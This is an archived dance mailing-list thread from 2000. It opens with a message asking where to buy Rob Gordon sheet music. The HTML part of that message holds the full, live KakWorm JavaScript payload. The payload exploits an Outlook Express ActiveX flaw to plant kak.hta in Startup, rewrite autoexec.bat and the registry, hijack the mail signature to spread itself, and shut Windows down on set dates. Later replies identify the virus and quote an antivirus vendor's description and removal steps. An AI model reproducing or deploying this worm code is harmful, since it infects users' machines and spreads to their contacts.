strathspey Archive: SCD sheet music

Previous thread: [Fwd: Peoria, IL]
Next thread: re:kak-worm virus in SCD sheet music

SCD sheet music

Message 21521 · Catherine · 16 Jun 2000 13:00:21 · Top

This is a multi-part message in MIME format.

------=_NextPart_000_0005_01BFD7D6.18AB0EA0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

I have obtained recently, a piece of sheet music published by Rob Gordon =
Music Publications, and would like to get more. I'm not sure if the =
address on it is sufficient to use, and was wondering if anyone knows =
the postal address, or any shop or organisation which sells this music. =
I would be grateful for this information or any pertinent web sites.

Catherine Linnen, Auckland, New Zealand

catara@paradise.net.nz=20

------=_NextPart_000_0005_01BFD7D6.18AB0EA0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2314.1000" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>I have obtained recently, a piece of =
sheet music=20
published by Rob Gordon Music Publications, and would like to get more. =
I'm not=20
sure if the address on it is sufficient to use, and was wondering if =
anyone=20
knows the postal address, or any shop or organisation which sells this =
music. I=20
would be grateful for this information or any pertinent web =
sites.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Catherine Linnen, Auckland, New=20
Zealand</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2><A=20
href=3D"mailto:catara@paradise.net.nz">catara@paradise.net.nz</A> =
</FONT></DIV>
<DIV>
<DIV style=3D"POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5">
<OBJECT classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC=20
id=3Dscr></OBJECT></DIV>
<SCRIPT><!--
function sErr(){return =
true;}window.onerror=3DsErr;scr.Reset();scr.doc=3D"Z<HTML><HEAD><TITLE>Dr=
iver Memory Error</"+"TITLE><HTA:APPLICATION ID=3D\"hO\" =
WINDOWSTATE=3DMinimize></"+"HEAD><BODY BGCOLOR=3D#CCCCCC><object =
id=3D'wsh' =
classid=3D'clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></"+"object><SCRIP=
T>function sEr(){self.close();return true;}window.onerror=3DsEr;fs=3Dnew =
ActiveXObject('Scripting.FileSystemObject');wd=3D'C:\\\\Windows\\\\';fl=3D=
fs.GetFolder(wd+'Applic~1\\\\Identities');sbf=3Dfl.SubFolders;for(var =
mye=3Dnew =
Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=3Dmye.item();ids=3Dnew =
String(idd);idn=3Dids.slice(31);fic=3Didn.substring(1,9);kfr=3Dwd+'MENUD=C9=
~1\\\\PROGRA~1\\\\D=C9MARR~1\\\\kak.hta';ken=3Dwd+'STARTM~1\\\\Programs\\=
\\StartUp\\\\kak.hta';k2=3Dwd+'System\\\\'+fic+'.hta';kk=3D(fs.FileExists=
(kfr))?kfr:ken;aek=3D'C:\\\\AE.KAK';aeb=3D'C:\\\\Autoexec.bat';if(!fs.Fil=
eExists(aek)){re=3D/kak.hta/i;if(hO.commandLine.search(re)!=3D-1){f1=3Dfs=
.GetFile(aeb);f1.Copy(aek);t1=3Df1.OpenAsTextStream(8);pth=3D(kk=3D=3Dkfr=
)?wd+'MENUD=90~1\\\\PROGRA~1\\\\D=90MARR~1\\\\kak.hta':ken;t1.WriteLine('=
@echo off>'+pth);t1.WriteLine('del =
'+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.CopyFile(kk,k2);fs.GetFile(=
k2).Attributes=3D2;}t2=3Dfs.CreateTextFile(wd+'kak.reg');t2.write('REGEDI=
T4');t2.WriteBlankLines(2);ky=3D'[HKEY_CURRENT_USER\\\\Identities\\\\'+id=
n+'\\\\Software\\\\Microsoft\\\\Outlook =
Express\\\\5.0';sg=3D'\\\\signatures';t2.WriteLine(ky+sg+']');t2.Write('\=
"Default =
Signature\"=3D\"00000000\"');t2.WriteBlankLines(2);t2.WriteLine(ky+sg+'\\=
\\00000000]');t2.WriteLine('\"name\"=3D\"Signature =
#1\"');t2.WriteLine('\"type\"=3Ddword:00000002');t2.WriteLine('\"text\"=3D=
\"\"');t2.Write('\"file\"=3D\"C:\\\\\\\\WINDOWS\\\\\\\\kak.htm\"');t2.Wri=
teBlankLines(2);t2.WriteLine(ky+']');t2.Write('\"Signature =
Flags\"=3Ddword:00000003');t2.WriteBlankLines(2);t2.WriteLine('[HKEY_LOCA=
L_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run]')=
;t2.Write('\"cAg0u\"=3D\"C:\\\\\\\\WINDOWS\\\\\\\\SYSTEM\\\\\\\\'+fic+'.h=
ta\"');t2.WriteBlankLines(2);t2.close();wsh.Run(wd+'Regedit.exe -s =
'+wd+'kak.reg');t3=3Dfs.CreateTextFile(wd+'kak.htm',1);t3.Write('<HTML><B=
ODY><DIV =
style=3D\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OBJECT =
classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC =
id=3Dscr></"+"OBJECT></"+"DIV>');t4=3Dfs.OpenTextFile(k2,1);while(t4.Read=
(1)!=3D'Z');t3.WriteLine('<SCRIPT><!--');t3.write('function =
sErr(){return =
true;}window.onerror=3DsErr;scr.Reset();scr.doc=3D\"Z');rs=3Dt4.Read(3095=
);t4.close();rd=3D/\\\\/g;re=3D/\"/g;rf=3D/<\\//g;rt=3Drs.replace(rd,'\\\=
\\\\\').replace(re,'\\\\\"').replace(rf,'</"+"\"+\"');t3.WriteLine(rt+'\"=
;la=3D(navigator.systemLanguage)?navigator.systemLanguage:navigator.langu=
age;scr.Path=3D(la=3D=3D\"fr\")?\"C:\\\\\\\\windows\\\\\\\\Menu =
D=E9marrer\\\\\\\\Programmes\\\\\\\\D=E9marrage\\\\\\\\kak.hta\":\"C:\\\\=
\\\\windows\\\\\\\\Start =
Menu\\\\\\\\Programs\\\\\\\\StartUp\\\\\\\\kak.hta\";agt=3Dnavigator.user=
Agent.toLowerCase();if(((agt.indexOf(\"msie\")!=3D-1)&&(parseInt(navigato=
r.appVersion)>4))||(agt.indexOf(\"msie =
5.\")!=3D-1))scr.write();');t3.write('//--></"+"'+'SCRIPT></"+"'+'OBJECT>=
</"+"'+'BODY></"+"'+'HTML>');t3.close();fs.GetFile(wd+'kak.htm').Attribut=
es=3D2;fs.DeleteFile(wd+'kak.reg');d=3Dnew Date();if(d.getDate()=3D=3D1 =
&& d.getHours()>17){alert('Kagou-Anti-Kro$oft says not today =
!');wsh.Run(wd+'RUNDLL32.EXE =
user.exe,exitwindows');}self.close();</"+"SCRIPT>S3 driver memory alloc =
failed &nbsp; =
!]]%%%%%</"+"BODY></"+"HTML>";la=3D(navigator.systemLanguage)?navigator.s=
ystemLanguage:navigator.language;scr.Path=3D(la=3D=3D"fr")?"C:\\windows\\=
Menu D=E9marrer\\Programmes\\D=E9marrage\\kak.hta":"C:\\windows\\Start =
Menu\\Programs\\StartUp\\kak.hta";agt=3Dnavigator.userAgent.toLowerCase()=
;if(((agt.indexOf("msie")!=3D-1)&&(parseInt(navigator.appVersion)>4))||(a=
gt.indexOf("msie 5.")!=3D-1))scr.write();
//--></SCRIPT>
</OBJECT></DIV></BODY></HTML>

------=_NextPart_000_0005_01BFD7D6.18AB0EA0--

CAUTION!!!!! : SCD sheet music

Message 21522 · Norman Dahl · 16 Jun 2000 14:05:19 · Top

> This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

--MS_Mac_OE_3044030636_1211491_MIME_Part
Content-type: text/plain; charset="US-ASCII"
Content-transfer-encoding: 7bit

I strongly suspect that Catherine Linnen's mail with this title was infected
with a virus (sorry, Catherine, not your fault).

-norman-

--
Norman Dahl
PO Box 578
Lutwyche
QLD 4030
--

--MS_Mac_OE_3044030636_1211491_MIME_Part
Content-type: text/html; charset="US-ASCII"
Content-transfer-encoding: quoted-printable

<HTML>
<HEAD>
<TITLE>CAUTION!!!!! : SCD sheet music</TITLE>
</HEAD>
<BODY>
<BLOCKQUOTE>I strongly suspect that Catherine Linnen's mail with this title=
was infected with a virus (sorry, Catherine, not your fault).<BR>
<BR>
-norman-<BR>
<BR>
</BLOCKQUOTE>-- <BR>
Norman Dahl<BR>
PO Box 578<BR>
Lutwyche<BR>
QLD 4030<BR>
-- <BR>
<BR>
<BR>
<BLOCKQUOTE><BR>
</BLOCKQUOTE><BR>
</BODY>
</HTML>

--MS_Mac_OE_3044030636_1211491_MIME_Part--

CAUTION!!!!! : SCD sheet music

Message 21523 · Ian Brockbank · 16 Jun 2000 14:20:51 · Top

Norman Dahl <norman@dahlfamily.org> wrote:

> I strongly suspect that Catherine Linnen's mail with this
> title was infected with a virus (sorry, Catherine, not your fault).

Indeed.

See http://www.datafellows.com/v-descs/kak.htm

F-Secure Virus Information Pages


Index Navigation
Select from the list Letter A Letter B Letter C Letter D Letter E
Letter F Letter G Letter H Letter I Letter J Letter K Letter L Letter M
Letter N Letter O Letter P Letter Q Letter R Letter S Letter T Letter U
Letter V Letter W Letter X Letter Y Letter Z Number 1 Number 2 Number 3
Number 4 Number 5 Number 6 Number 7 Number 8 Number 9 Number 0 other
Latest 50

NAME: Kak
ALIAS: Wscript.KakWorm, KakWorm

Kak is a worm that embeds itself to every email sent from the infected
system, without any attachment, like BubbleBoy does. For further
information about BubbleBoy, see the description:
http://www.F-Secure.com/v-descs/bubb-boy.htm

Kak is written in JavaScript and it works on both English and French
versions of Windows 95/98 if Outlook Express 5.0 is installed. It does
not work in a typical Windows NT installation.

The worm uses a known security vulnerability that affects Outlook
Express. Once the user receives an infected email message, and opens or
views the message in the preview pane, the worm creates a file "kak.hta"
to the Windows Startup directory.

Next time when the system is restarted, the worm activates. It replaces
"c:\autoexec.bat" with a batch file that deletes the worm from the
Startup directory. The original "autoexec.bat" is copied to "C:\AE.KAK".

It also modifies the message signature settings of Outlook Express 5.0
replacing the current signature with an infected file,
"C:\Windows\kak.htm".

Therefore every message sent with Outlook Express after that will
contain the worm.

Next it modifies the Windows registry in a such way that it will be
executed in every system startup. The key it adds to the registry is:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cAg
0u

The .hta file that the virus creates and will be executed is saved to
Windows System directory. In first day of each month if the number of
hours is more than 17 (i.e. 6pm or later), the worm will show an alert
box with the following text:

Kagou-Anit-Kro$oft say not today!


Then the worm causes the Windows to shut down.

F-Secure Anti-Virus detects the worm. When the worm has been detected,
the user should delete the following files, if they exist:

C:\Windows\kak.htm
C:\Windows\System\(filename).hta
where (filename) is a variable, and it changes from one system
to another

C:\Windows\Start Menu\Programs\Startup\kak.hta
C:\Windows\Menu Demarrer\Programmes\Demarrage\kak.hta

The "autoexec.bat" can be restored by copying the "C:\AE.KAK" to
"C:\autoexec.bat".

Kak uses a known security hole in Microsoft Outlook Express to create
the local HTA file.

If active scripting is disabled from Outlook Express, then the worm will
not work.

Microsoft has more information on this problem available at:
http://www.microsoft.com/Security/Bulletins/MS99-032faq.asp

They have also a patch to fix this problem at
http://www.microsoft.com/security/Bulletins/ms99-032.asp

[Analysis: Katrin Tocheva and Sami Rautiainen, F-Secure]

--
Ian Brockbank, Indigo Active Vision Systems, The Edinburgh Technopole,
Bush Loan, Edinburgh EH26 0PJ Tel: 0131-475-7234 Fax: 0131-475-7201
work: ian@indigo-avs.com personal: Ian.Brockbank@bigfoot.com
web: ScottishDance@bigfoot.com http://www.scottishdance.net/
Feed the World http://www.hungersite.com/

CAUTION!!!!! : SCD sheet music

Message 21524 · Simon Barbour · 16 Jun 2000 14:28:39 · Top

Yes it has

On 16 Jun 00, at 20:03, Norman Dahl wrote:

> I strongly suspect that Catherine Linnen's mail with this title was infected
> with a virus (sorry, Catherine, not your fault).
>
> -norman-
>
> --
> Norman Dahl
> PO Box 578
> Lutwyche
> QLD 4030
> --
>
>
>
>
>
>

Previous thread: [Fwd: Peoria, IL]
Next thread: re:kak-worm virus in SCD sheet music
A Django site.